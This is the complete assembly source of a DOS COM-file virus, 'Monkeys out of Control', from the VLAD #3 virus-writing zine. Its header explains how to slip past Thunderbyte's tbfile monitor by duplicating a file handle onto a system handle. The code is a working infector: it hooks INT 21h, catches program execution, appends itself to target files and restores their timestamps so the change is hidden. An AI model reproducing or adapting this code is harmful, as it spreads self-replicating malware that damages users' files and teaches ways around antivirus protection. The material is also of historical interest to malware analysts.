; Monkeys out of Control, a laboratory specimen by Rhincewind [Vlad]
;
; The purpose of this virus is to show that Thunderbyte's tbfile will
; allow writes to file handles that are normally characterbased
; 'system' handles, set to CON:. Instead of checking if the handle points
; to a character device, tbfile makes it's judgement based on the handle
; number only. Tsss..
;
; To exploit this flaw, all you have to do is open your target file
; for read/write and copy the returned file handle to one of the system
; handles using function 46h.
.model tiny
.code
org 100h
start:
dec bp
mov si, offset endvirus-2
mov cx, (endvirus-start)/2
std
pushloop:
lodsw
push ax
loop pushloop
push sp
pop ax
add ax,(stack_entry-start)
push ax
cli
ret
stack_entry:
dec sp
dec sp
pop bp
sti
no_int1:
cld
mov word ptr [bp+(jmpseg-stack_entry)],cs
mov si,offset restore-100h
org $-2
restore_offset dw ?
mov di, 100h
add si,di
mov cx, (endvirus-start)
rep movsb
push cx
lea si, [bp-(stack_entry-start)]
mov di, 200h
mov es, word ptr [si-2]
mov cx, (endvirus-start)
rep movsb
mov ds,cx
mov ax, offset seg0_entry+100h
push ax
mov ax,0eaf9h
push ax
jmp sp
db 'Monkeys out of Control'
seg0_entry:
jc dont_hang
jmp $
dont_hang:
mov di, 84h
les bx, dword ptr es:[di]
cmp byte ptr ds:[di+2],20h
jz exit
mov word ptr ds:[di+(int21offset+100h-84h)],bx
mov word ptr ds:[di+(int21seg+100h-84h)],es
mov word ptr ds:[di+2],20h
mov word ptr ds:[di], offset int21-100h
exit:
mov ax, [jmpseg+100h]
mov ds,ax
mov es,ax
mov sp,0fffch
xor ax,ax
xor bx,bx
cwd
xor bp,bp
xor si,si
xor di,di
db 0eah
jmpoffset dw 100h
jmpseg dw 0
int21:
cmp ax, 4b00h
jnz jmporg21
push ax
push bx
push cx
push dx
push ds
push es
mov ah, 48h
mov bx, (((endvirus-start)+15)/16)
int 21h
jc abort_before_mem
push ax
push ax
mov ax,3d02h
int 21h
xchg ax,dx
pop ds
jc free_mem_abort
mov ah, 45h
xor bx,bx
int 21h
push ax
mov ah, 46h
mov bx,dx
xor cx,cx
int 21h
push ax
mov ah, 3eh
int 21h
pop bx
mov ah, 3fh
call cx_len_dx_zero
cmp byte ptr ds:[bx],'M'
jz file_abort
mov ax, 4202h
mov cx,bx
int 21h
mov cs:restore_offset-100h,ax
mov ax, 5700h
push ax
int 21h
push cx
push dx
call write
mov ax, 4200h
mov cx,bx
int 21h
push cs
pop ds
call write
pop dx
pop cx
pop ax
inc ax
int 21h
file_abort:
mov ah, 46h
pop bx
xor cx,cx
int 21h
mov ah,3eh
int 21h
free_mem_abort:
pop es
mov ah, 49h
int 21h
abort_before_mem:
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmporg21:
jmp dword ptr cs:int21offset-100h
write:
mov ah,40h
cx_len_dx_zero:
cwd
mov cx, (endvirus-start)
int21_ret:
int 21h
ret
align word
endvirus:
restore:
int21offset dw 20cdh
int21seg dw ?
end start
- VLAD #3 INDEX -